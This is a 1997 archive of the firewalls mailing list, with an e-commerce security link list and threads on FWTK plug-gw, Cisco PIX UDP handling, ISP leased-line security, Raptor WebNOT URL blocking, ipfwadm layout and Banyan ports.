firewalls@GreatCircle.COM Message-id: <01IJM9Q1SC1EHT6XBR@vmsuser.acsu.unsw.EDU.AU> MIME-version: 1.0 X-Mailer: Microsoft Internet Mail 4.70.1161 Content-type: text/plain; charset=ISO-8859-7 Content-transfer-encoding: 7bit X-MSMail-Priority: Normal X-Priority: 3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi to all, First of all, a big thank you to all who replied to my queries on EC and Firewall architecture a little while ago. Secondly, as I had promised, here is a list about Electronic Commerce divided into the following sections: A) EC B) Standards, C) Security Issues D) Government & Associations E) Legal Issues, F) A Case Study G) Various Authors on EC H) Journals & News A) On E-Commerce & Security Electronic Commerce and Security http://www.v-one.com/pubs/ecommerc/ecommerc.htm Building a New Paradigm for Business http://galaxy.tradewave.com:80/tradewave/products/whitpapr.html http://www.saaconsultants.com/ http://www.saa-cons.co.uk/ Electronic Commerce Over The Internet http://galaxy.tradewave.com:80/tradewave/products/vpiwp.html The Internet and EDI http://www.digital.com/info/edi/edi-inet.html Electronic Commerce, EDI, EDIFACT and Security http://www.email.demon.co.uk/eees/eees.htm Electronic Commerce on Internet : Security challenge http://www.syselog.fr/asia/singapore/expo_ce_security.html Electronic Commerce Security http://www.securityserver.com/cgi-local/ssis.pl/category/@elecom. htm Eric Glover's links to Security and Electronic Commerce http://ai.eecs.umich.edu/people/compuman/security_links.html Electronic Commerce Security: Miscellaneous Topics http://www.securityserver.com/cgi-local/ssis.pl/category/@elecom5 htm B) On Standards DISA Home Page http://www.disa.org/ Secretariat of ECAT - Implementation Conventions http://snad.ncsl.nist.gov/dartg/edi/ic.html C) On Security Issues Basic Flaws in Internet Security and Commerce http://http.cs.berkeley.edu/~gauthier/endpoint-security.html D) Government & Associations Internet and Telecommunications Policy Presentation http://werbach.com/fcc/iworld.html Standards Australia On-line http://www.standards.com.au/~sicsaa/ Federal Communications Commission (FCC) Home Page http://werbach.com/fcc/ IEC - International Electrotechnical Commission - Home Page (English) http://www.iec.ch/ Electronic Commerce World Institute http://www.ecworld.org/ E) On Legal Issues http://infohaus.com/access/by-seller/benjamin_Wright F) A Case Study Case Study: Electronic Commerce on The World Wide Web http://www.cox.smu.edu/mis/cases/webcase/home.html G) Various Authors Roger Clarke's Home Page http://www.anu.edu.au../people/Roger.Clarke/ ABA Electronic Commerce Division http://www.abanet.org/scitech/ec/home.html H) Journals & News on EC On-line Security Frontier at EC World http://yama.bus.utexas.edu/ejou/sec/ EC World: On-line journal for electronic commerce - Articles, Resource Directory, Discussions http://ecworld.utexas.edu/ Online publication http://www.commerce.net ComputerWorld Emmerce. http://www.computerworld.com/emmerce/index.html ---------------- regards, Constantinos C. From owner-firewalls-outgoing Mon Jun 2 09:42:02 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA11534 for firewalls-outgoing; Mon, 2 Jun 1997 09:26:52 -0700 (PDT) Received: from mail.diginsite.com (mail.diginsite.com [208.2.189.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA11522 for ; Mon, 2 Jun 1997 09:26:42 -0700 (PDT) Received: from march.diginsite.com (march.diginsite.com [208.2.189.102]) by mail.diginsite.com (8.8.5/8.8.3) with ESMTP id JAA07146; Mon, 2 Jun 1997 09:27:47 -0700 Message-Id: <199706021627.JAA07146@mail.diginsite.com> From: "David Lang" To: "Ken Kempster" , "fwtk" , "firewalls" Subject: Re: Plug-gw- One to many relationship Date: Mon, 2 Jun 1997 08:28:49 -0700 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is not supposed to work. David Lang ---------- > From: Ken Kempster > To: fwtk ; firewalls > Subject: Plug-gw- One to many relationship > Date: Monday, June 02, 1997 7:31 AM > > Hi all, > > Has anyone gotten a one to many relationship to work > with FWTK 2.0? > > I want to be able to specify x.x.x.x plug-to * > or > x.x.x.x plug-to x.x.x.x x.x.x.x etc. > > > thanx for any help. > > > > > > |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| > | Ken Kempster kempster@monarch.rnb.com | > | Network Systems Engineer _\|/_ | > | Republic National Bank (o o) | > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ From owner-firewalls-outgoing Mon Jun 2 09:59:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA08684 for firewalls-outgoing; Mon, 2 Jun 1997 08:59:43 -0700 (PDT) Received: from paranoid.convey.ru (ws03.convey.ru [195.182.128.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA08676 for ; Mon, 2 Jun 1997 08:59:35 -0700 (PDT) Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id TAA25472; Mon, 2 Jun 1997 19:48:59 +0400 From: ArkanoiD Message-Id: <199706021548.TAA25472@paranoid.convey.ru> Subject: Re: Plug-gw- One to many relationship To: kempster@monarch.rnb.com (Ken Kempster) Date: Mon, 2 Jun 1997 19:48:51 +0400 (MSD) Cc: fwtk-users@tis.com, firewalls@GreatCircle.COM In-Reply-To: from "Ken Kempster" at Jun 2, 97 10:31:54 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk nuqneH, > > Has anyone gotten a one to many relationship to work > with FWTK 2.0? > > I want to be able to specify x.x.x.x plug-to * > or > x.x.x.x plug-to x.x.x.x x.x.x.x etc. > ..and how should destinations be distinguished? -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! From owner-firewalls-outgoing Mon Jun 2 10:03:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA11793 for firewalls-outgoing; Mon, 2 Jun 1997 09:29:26 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA11745 for ; Mon, 2 Jun 1997 09:29:10 -0700 (PDT) Received: from cons-evyncke.cisco.com (bru-dhcp30.cisco.com [171.68.129.144]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id SAA14384; Mon, 2 Jun 1997 18:30:11 +0200 (METDST) Message-Id: <2.2.32.19970602182802.00754200@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 02 Jun 1997 18:28:02 +0000 To: "Randy.Witlicki.", firewalls@GreatCircle.COM From: Eric Vyncke Subject: Re: Apparent ANSWER: Cisco PIX Version 4 udp problem Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Randy, Your interpretation is probably correct... as the control connection is to .22 and the incoming data UDP stream comes from .254, the PIX obviously and securely denies the access. I cannot imagine any secure way of handling it. BTW, even if I'm working in Cisco, I'm not THE PIX expert. Best regards Eric At 15:19 1/06/97 -0400, Randy.Witlicki. wrote: > > Don't you just love it when you answer your own post? > So there I am, out for my afternoon run. Are nice spring thoughts >in my mind? No, its full of packets and protocols and such. > A probable answer hits me, so I get back to the PIX and >turn on verbose syslogging. > In my previous post I said: > >> ...... PIX firewall Version 4.0.4 >> However, when I try the Streamworks or VDOLive web plug-ins, >>I get the following at the PIX console (with no *established* >>command in the configuration): >> >><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1144 >> and >><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1263 > > I try a site with VDO that I know is not very big. It works. I go >back to my test case and it fails. The PIX syslog output has: > ><166> 304001 192.168.1.2 accessed URL 207.40.202.22:/nbrx.vdo HTTP/1.0 > followed shortly by: ><162> 106006 deny inbound udp from 207.40.202.254 7001 to 192.168.1.2 1191 > > This is on http://intv.net >% traceroute intv.net >traceroute to intv.net (207.40.202.22), 30 hops max, 40 byte packets > ...... >15 AccessUS-1.ChcgIL.savvis.com (206.114.200.250) >16 vision.accessus.net (207.40.202.254) > > So the URL was at .22 and the UDP stream came from .254 and it looks >like the cisco PIX "enhanced multimedia Adaptive Security algorithm" >(to use cisco's terminology) does not allow for this situation. > > - Randy randy.witlicki@valley.net > Norwich, Vermont USA > - > > > Eric Vyncke Internet, security consultant Cisco Systems Belgium SA/NV /------------------------------------\ Phone: +32-2-778.4677 | Networks bring | Fax: +32-2-778.4300 | people | E-mail: evyncke@cisco.com | together... | Mobile: +32-75-312.458 \------------------------------------/ From owner-firewalls-outgoing Mon Jun 2 10:15:45 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA17357 for firewalls-outgoing; Mon, 2 Jun 1997 10:08:53 -0700 (PDT) Received: from balder-int.ssds.com (balder.ssds.com [204.131.72.62]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA17246 for ; Mon, 2 Jun 1997 10:08:31 -0700 (PDT) Received: by balder-int.ssds.com id LAA27735; Mon, 2 Jun 1997 11:09:24 -0600 (MDT) Received: from denver.ssds.com(134.127.16.1) by balder.ssds.com via smap (3.2) id xma027713; Mon, 2 Jun 97 11:08:59 -0600 Received: by denver.ssds.com id LAA19596; Mon, 2 Jun 1997 11:11:31 -0600 (MDT) Date: Mon, 2 Jun 1997 11:11:30 -0600 (MDT) From: Scott Lupfer - Colorado Springs X-Sender: svl@denver To: Mariko Yashada cc: Firewalls Mailing List Subject: Re: ISP Connection In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually, this is secure, but it is not any less secure than MCI for instance. At a customer site, we have a connection to MCI and it is advertised as a class C address from MCI as part of the MCI.COM domain. The only difference we noticed when we researched this type of service was performance. With MCI we get full T-1 to the MCI Internet POP, whereas you may only get full T-1 to the ISP and then compete with everyone else for part of the bandwidth to the internet. On Mon, 2 Jun 1997, Mariko Yashada wrote: > Date: Mon, 02 Jun 97 11:37:15 PDT > From: Mariko Yashada > To: Firewalls Mailing List > Subject: ISP Connection > > > > My company is currently getting Internet access through a local ISP, using > PPP connections. We are now considering replacing the dial-up connections > with a leased line to the ISP. We will leave our web server at the ISP and > will continue to use their e-mail server. There will be a router at the ISP > end of the line. The line will connect to our Enterprise Network through a > router at our end. We will also put a proxy server at our end to filter out > going access and do NAT. > > The ISP people say this type of connection is more secure than a direct > connection to the Internet through say MCI, becuase our router will be > "hidden" behind their routing system. The IP address of our router will not > be accessable from outside the ISP domain. > > We will not allow incomming connections such as telnet or ftp. We will > restrict access from inside the company to e-mail, http, ftp and probably > audio. > > My question is, how secure is this type of connection? How difficult is it > for someone outside the ISP domain to discover and access our connection? > > Thanks, > > Mariko > Scott Lupfer Network/Systems Engineer SSDS, Inc E-mail: svl@ssds.com 21NET Phone: (719) 554-9833 Voice Mail: (719) 630-0100 x206 Pager: 1-800-931-5919 A radioactive cat has eighteen half-lives! From owner-firewalls-outgoing Mon Jun 2 11:45:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00503 for firewalls-outgoing; Mon, 2 Jun 1997 11:38:23 -0700 (PDT) Received: from out2.ibm.net (out2.ibm.net [165.87.194.229]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00491 for ; Mon, 2 Jun 1997 11:38:09 -0700 (PDT) Received: from urban-s-aptiva (slip129-37-114-167.pa.us.ibm.net [129.37.114.167]) by out2.ibm.net (8.8.5/8.6.9) with SMTP id SAA52032; Mon, 2 Jun 1997 18:45:50 GMT Message-ID: <339312EA.681@urbantechnology.com> Date: Mon, 02 Jun 1997 13:39:19 -0500 From: "Urban A. Haas" Organization: Urban Technology, Inc. X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: csubasi@garanti.com.tr CC: Root Admin-KSoft , Firewall Mailing List Subject: Re: SNG and performance... References: <338E2B0D.62A3@garanti.com.tr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Cihan Subasi wrote: > > Root Admin-KSoft wrote: > > > > On Thu, 29 May 1997, Cihan Subasi wrote: > > > > > Anybody experienced SNG slowing down the traffic with 50+ users? > > > I checked the line utilization and SNG, and seems like SNG is the > > Depends on your config. For example do you use NAT? SOCKS? or PROXY? > > how about your filter definitions? > > > > I use both SOCKS and PROXY (telnet and ftp) The proxy users are causing this. Proxy users are running local processes on the firewall (for each proxy user, a telnet or ftp session [process] is running on the firewall). SOCKS is more efficient than proxy [processes are not created for each session] and you should be able to increase the number ofusers going through the firewall at once. NAT/Filters is even more efficient yet, but you would need to be at v2 of the firewall code to have that option. If you are at v1, your best bet is to have all of your users use SOCKS instead of proxies. Or, you can get more firewalls, upgrade the CPU, etc. > > > Regards, > > Kerem ERSOY > > > > > bottleneck but could it be the hardware causing this problem I believe > > > memory is enough for 100 + user (we have 128Meg on it).... -- Urban A. Haas CEO - Urban Technology, Inc. E-mail: uhaas@urbantechnology.com (mailto:uhaas@urbantechnology.com) Phone: (612) 938-2610 From owner-firewalls-outgoing Mon Jun 2 12:14:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00644 for firewalls-outgoing; Mon, 2 Jun 1997 11:39:49 -0700 (PDT) Received: from zeke.gov.yk.ca (ZEKE.GOV.YK.CA [199.247.128.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00628 for ; Mon, 2 Jun 1997 11:39:40 -0700 (PDT) Received: by zeke.gov.yk.ca; id LAA13173; Mon, 2 Jun 1997 11:48:55 -0700 (PDT) Received: from unknown(199.247.130.39) by zeke.gov.yk.ca via smap (V3.1) id xma013140; Mon, 2 Jun 97 11:48:31 -0700 Received: from [199.247.134.75] ([199.247.134.75]) by tempest.gov.yk.ca (8.7.5/8.7.3) with SMTP id LAA23266; Mon, 2 Jun 1997 11:35:27 -0700 From: Larry Kwiat To: Mariko Yashada cc: Firewalls Mailing List Subject: Re: ISP Connection Message-ID: Date: Mon, 2 Jun 1997 11:54:56 -0400 (EDT) X-Mailer: Simeon for Windows Version 4.0 X-Authentication: none MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 02 Jun 97 11:37:15 PDT Mariko Yashada wrote: - the idea of taking an ISP's word that their leased line to you through a "private" router engaged in their system is sufficient to hang the company jewels on quite securely and without a firewall... > My question is, how secure is this type of connection? How difficult is it > for someone outside the ISP domain to discover and access our connection? In my professional opinion, if an ISP salesman said that to me, I'd ask him to bring his technical people along for a discussion, where I'd ask them a whole series of techie questions the answers to which would probably be not satisfactory. That is because I work for a large integrated organization. If I were in the same position in a large private organization with as much value on the line as the average government, I wouldn't bother that vendor with the inquisition, I would find another ISP. In my opinion, a firewall is NECESSARY in the loop with the public internet. I wouldn't like to consider what might happen without one. a) you don't have enough contracting authority in the usual arrangement witb an ISP to ensure the proper steps are always taken on your behalf. b) You can't manage change control at all on their system. c) You have no assurance of high priority action on your behalf in the event of a breach of their security. Strictly from a security management position, never mind the technicalities, I don't think what your ISP is proposing is what I would consider a good idea, if I were in your shoes... This is a personal, professional opinion. Sincerely, Larry Kwiat Information Security Coordinator Information Services Branch Department of Government Services Government of Yukon Phone: (403) 667-8081 Fax: (403) 667-5304 Netmail: kwiat@gov.yk.ca From owner-firewalls-outgoing Mon Jun 2 12:15:45 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00877 for firewalls-outgoing; Mon, 2 Jun 1997 11:42:24 -0700 (PDT) Received: from inet02.us.abatos.com (gatekeep.us.landisgyr.com [206.175.68.122]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00870 for ; Mon, 2 Jun 1997 11:42:18 -0700 (PDT) Received: by inet02.us.abatos.com; id OAA03537; Mon, 2 Jun 1997 14:47:36 -0400 (EDT) Received: from inet05.us.abatos.com(204.207.110.249) by gatekeep.us.landisgyr.com via smap (3.2) id xma003532; Mon, 2 Jun 97 14:47:17 -0400 Received: by news.us.landisstaefa.com; id MAA08436; Mon, 2 Jun 1997 12:46:26 -0500 Received: by USBGREXCH01 with Internet Mail Service (5.0.1457.3) id ; Mon, 2 Jun 1997 13:44:39 -0500 Message-ID: <0C673F68C3A0D011A94208002BE526253524@USBGREXCH01> From: "Kohn, Joav" To: Mariko Yashada Cc: Firewalls Mailing List Subject: RE: ISP Connection Date: Mon, 2 Jun 1997 13:44:33 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk unless you have a screening router (or proxy server, or firewall) at your end, you have no security at all. just cause the direct route to your network is hidden doesn't give you any security. if it made it impossible for the internet to reach you, none of your internet requests would ever get back to you. no matter how you go, ISP or MCI/SPRINT/ATT, you still need to get some type of protection on your end, under your control. after all, would you want to bank your company on your internet provider? -joav kohn sr. technical consultant it/workgroup communications landis & staefa > > Date: Mon, 02 Jun 97 11:37:15 PDT > > From: Mariko Yashada > > To: Firewalls Mailing List > > Subject: ISP Connection > > > > > > > > My company is currently getting Internet access through a local ISP, > using > > PPP connections. We are now considering replacing the dial-up > connections > > with a leased line to the ISP. We will leave our web server at the > ISP and > > will continue to use their e-mail server. There will be a router at > the ISP > > end of the line. The line will connect to our Enterprise Network > through a > > router at our end. We will also put a proxy server at our end to > filter out > > going access and do NAT. > > > > The ISP people say this type of connection is more secure than a > direct > > connection to the Internet through say MCI, becuase our router will > be > > "hidden" behind their routing system. The IP address of our router > will not > > be accessable from outside the ISP domain. > > > > We will not allow incomming connections such as telnet or ftp. We > will > > restrict access from inside the company to e-mail, http, ftp and > probably > > audio. > > > > My question is, how secure is this type of connection? How difficult > is it > > for someone outside the ISP domain to discover and access our > connection? > > > > Thanks, > > > > Mariko > > From owner-firewalls-outgoing Mon Jun 2 12:30:24 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA03911 for firewalls-outgoing; Mon, 2 Jun 1997 12:14:26 -0700 (PDT) Received: from netsafe-r.bbtnet.com (netsafe-external.bbtnet.com [208.6.60.37]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA03902 for ; Mon, 2 Jun 1997 12:14:17 -0700 (PDT) Received: from eve.bbtnet.com by netsafe-r.bbtnet.com via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 2 Jun 1997 19:17:47 UT Received: from ss1011-tt.bbtnet.com by bbtnet.com (SMI-8.6/SMI-SVR4) id PAA29173; Mon, 2 Jun 1997 15:16:18 -0400 Received: by ss1011-tt.bbtnet.com with Microsoft Mail id <01BC6F68.54F8BA80@ss1011-tt.bbtnet.com>; Mon, 2 Jun 1997 15:19:15 -0400 Message-ID: <01BC6F68.54F8BA80@ss1011-tt.bbtnet.com> From: Tim Thayer To: "2LT Jeffery J. Lowder, 333-4615" , "bpetrie@incc.net" , "raptor-list@udc.com" , "firewalls@greatcircle.com" , "'Allen Rogers'" Subject: RE: Does Raptor WebNOT Block Legitimate Sites? Date: Mon, 2 Jun 1997 15:19:12 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com Tim Thayer Information Security Branch Banking & Trust >Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST) >X-Sender: arogers@raptor1.raptor.com (Unverified) >To: "2LT Jeffery J. Lowder, 333-4615" , > , , >From: Allen Rogers >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > >This is a list that Raptor licenses directly from Microsystems. The actual >URLs used, and their abbreviated nature, is due to how Microsystems chooses >to create their list. I am trying to open a formal path where our customers >can present queries/requests to them directly for particular sites. I will >keep you posted. > >-Allen > >At 09:29 AM 3/10/97 MST, 2LT Jeffery J. Lowder, 333-4615 wrote: >>Hello, >> >>We recently installed Raptor WebNOT to work with our Raptor Eagle 4.0 >>firewall. Remember that WebNOT can be used to block access to >>'unauthorized' sites, where 'unauthorized' is defined as sites the company >>doesn't want its employees visiting. >> >>Apparently their database of 'bad' URLs contains many truncated URLs. If >>the URL is just an IP address, everything works great. However, if the >>URL is more than an IP address -- if the URL contains a directory path, a >>filename, or both -- we've found that the URL is normally truncated when >>listed in the WebNOT database. For example, the URL for DejaNews Research >>Service, >> >>http://199.86.32.6/members/stick/ >> >>is stored in the WebNOT database (httprating.db) as >> >>http://199.86.32.6/mem >> >>Now, I don't claim to have detailed knowledge of the computer at >>199.86.32.6, but it stands to reason that there are probably multiple >>subdirectories under the /members directory. Yet Raptor WebNOT blocks >>access to ALL of these directories because apparently ONE of them contains >>nudity. >> >> >>You can imagine how much I enjoy taking heat from customers because we're >>blocking access to ostensibly legitimate sites. >> >>Am I not understanding something, or is this very poor design on Raptor's >>part? Is there anyone else out there who uses Raptor WebNOT and has >>experienced this problem? >> >>I tried calling Raptor directly to make a bug report, but since I don't >>have a maintenance contract with Raptor, the operator at Raptor customer >>support wouldn't even take my call. >> >>Lt Jeff Lowder >>Chief, Network Security >>United States Air Force Academy >> >>Disclaimer: The above content does not necessarily represent the views of >>the United States Government or the United States Air Force Academy. >> >> >+-----------------------------------------------------------------------+ >Allen Rogers | Raptor Systems Customer Support >arogers@raptor.com | http://www.raptor.com/cs/ >(617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX) >+-----------------------------------------------------------------------+ > > > +-----------------------------------------------------------------------+ Allen Rogers | Raptor Systems Customer Support arogers@raptor.com | http://www.raptor.com/cs/ (617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX) +-----------------------------------------------------------------------+ From owner-firewalls-outgoing Mon Jun 2 13:30:56 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA13877 for firewalls-outgoing; Mon, 2 Jun 1997 13:24:36 -0700 (PDT) Received: from relay.mnsinc.com (relay1.mnsinc.com [206.55.3.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA13861 for ; Mon, 2 Jun 1997 13:24:28 -0700 (PDT) Received: from snowball.webtrek.com (klemmerj@snowball.webtrek.com [206.239.36.10]) by relay.mnsinc.com (8.8.5/8.7.3) with SMTP id QAA00516 for ; Mon, 2 Jun 1997 16:27:58 -0400 (EDT) Date: Mon, 2 Jun 1997 16:28:20 -0400 (EDT) From: Joe Klemmer Reply-To: klemmerj@webtrek.com To: firewalls@GreatCircle.COM Subject: ipfwadm question (and procmailrc test) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I will be setting up a FW using RH Linux and ipfwadm (mainly because there's no funding to pay for a commercial product) and I have one quick question. It's more related to the physical setup of the FW in that, if I'm not mistaken, I'd need to put the FW PC physically in front of all the nodes in the LAN, right? IOW, it should look like this: Gateway Box | | Firewall Box | | LAN Router / | \ / | \ / | \ Node 1 Node 2 Node 3 I know this is in the FW books (Cheswick's and Chapman's) but I haven't had time to go into them much. This is really more a sticking point in my brain, I guess. I need a better visualization of this whole thing. --- "It's a damn poor mind that can only think of one way to spell a word." -- Andrew Jackson From owner-firewalls-outgoing Mon Jun 2 14:16:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA18550 for firewalls-outgoing; Mon, 2 Jun 1997 14:02:13 -0700 (PDT) Received: from quix.robins.af.mil (quix.robins.af.mil [137.244.193.103]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA18503 for ; Mon, 2 Jun 1997 14:02:00 -0700 (PDT) Received: by quix.robins.af.mil; (5.65v3.2/1.1.8.2/01Nov95-0110PM) id AA22662; Mon, 2 Jun 1997 17:06:38 -0400 From: "Mr. Jolt Cola" Message-Id: <9706022106.AA22662@quix.robins.af.mil> Subject: Banyan ports through firewall? To: firewalls@greatcircle.com Date: Mon, 2 Jun 1997 17:06:38 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Could someone tell me what ports Banyan uses to communicate? I searched the web and came up with tcp and udp 567 and 573. The servers still do not talk through the firewall with these ports open. Any ideas? I'll probably just go out and do some packet sniffing but I was hoping someone here knew. Thanks, Melvin Smith From owner-firewalls-outgoing Mon Jun 2 15:11:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA20185 for firewalls-outgoing; Mon, 2 Jun 1997 14:18:54 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA20166 for ; Mon, 2 Jun 1997 14:18:43 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA13963; Mon, 2 Jun 1997 17:21:56 -0400 Received: from vaxa.PIOS.COM (vaxa.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJLSJK4A688WWM05@gemini.pios.com> for firewalls@greatcircle.com; Mon, 02 Jun 1997 17:23:51 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJLSHA50PS8Y53R1@PIOS.PIOS.COM> for firewalls@greatcircle.com; Mon, 02 Jun 1997 17:22:02 -0400 (EDT) Date: Mon, 02 Jun 1997 14:25:43 -0700 From: Bill Stout Subject: Performance and FR question X-Sender: stoutb@vaxf.pios.com To: firewalls@greatcircle.com Message-Id: <2.2.32.19970602212543.006e1e94@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone noticed performance issues with Frame Relay connections to the internet? Many years ago I connected offices together via 'secure' FR VPNs (I know better now), and noticed that WAN performance increased if I shrunk the MTU to a multiple of 128 - 768 working best in my situation. I'm gussing this is because of the X.25 parentage of FR (packet size). Are others adjusting the size of the MTU on the internet side of their firewalls? Because of the presence of FR on the net, is this something all feeds should worry about? Will ATM backbones impact packet size? Am I just imagining this or was this a situational fluke? Bill Stout _____________________________________________________________________________ Bill Stout (Systems Engineer/Consultant) stoutb@pios.com Pioneer Standard (Computer Systems & Components) http://www.pios.com/ San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 *My opinions do not reflect that of the company, and visa-versa, thankfully.* From owner-firewalls-outgoing Mon Jun 2 16:00:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA01638 for firewalls-outgoing; Mon, 2 Jun 1997 15:47:48 -0700 (PDT) Received: from mail.sla.com (mail1.sla.com [207.153.168.35]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA01579 for ; Mon, 2 Jun 1997 15:47:36 -0700 (PDT) Received: by mail1.sla.com with Internet Mail Service (5.0.1457.3) id ; Mon, 2 Jun 1997 15:50:48 -0700 Message-ID: <31557D725263D011B53A0060974FB8DC028B58@mail1.sla.com> From: Bill Stackpole To: "'Mr. Jolt Cola'" Cc: "'firewalls@greatcircle.com'" Subject: RE: Banyan ports through firewall? Date: Mon, 2 Jun 1997 15:50:46 -0700 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Banyan says port 573 for udp and 83 for tcp. I haven't tried these yet but I will be setting up a firewall shortly so let me know if they work. Thanks. "Simplify - There is no value in complexity, it's too difficult to manage." Bill Stackpole, CISSP Seitel Leeds & Associates Voice: 206.283.4355 2 Nickerson St. Suite 201 Email: bstackpole@sla.com Seattle, Wa 98109 > -----Original Message----- > From: Mr. Jolt Cola [SMTP:msmith@quix.robins.af.mil] > Sent: Monday, June 02, 1997 2:07 PM > To: firewalls@greatcircle.com > Subject: Banyan ports through firewall? > > Could someone tell me what ports Banyan uses to communicate? > I searched the web and came up with tcp and udp 567 and 573. > The servers still do not talk through the firewall with these > ports open. Any ideas? I'll probably just go out and do some > packet sniffing but I was hoping someone here knew. > > Thanks, > > Melvin Smith From owner-firewalls-outgoing Mon Jun 2 16:36:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA04535 for firewalls-outgoing; Mon, 2 Jun 1997 16:07:15 -0700 (PDT) Received: from ormail.intel.com (ormail.intel.com [134.134.248.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA04509 for ; Mon, 2 Jun 1997 16:07:08 -0700 (PDT) Received: from zonn-new.hf.intel.com (zonn-new.hf.intel.com [143.181.153.134]) by ormail.intel.com (8.8.4/8.8.4) with ESMTP id QAA29097 for ; Mon, 2 Jun 1997 16:10:19 -0700 (PDT) Message-ID: 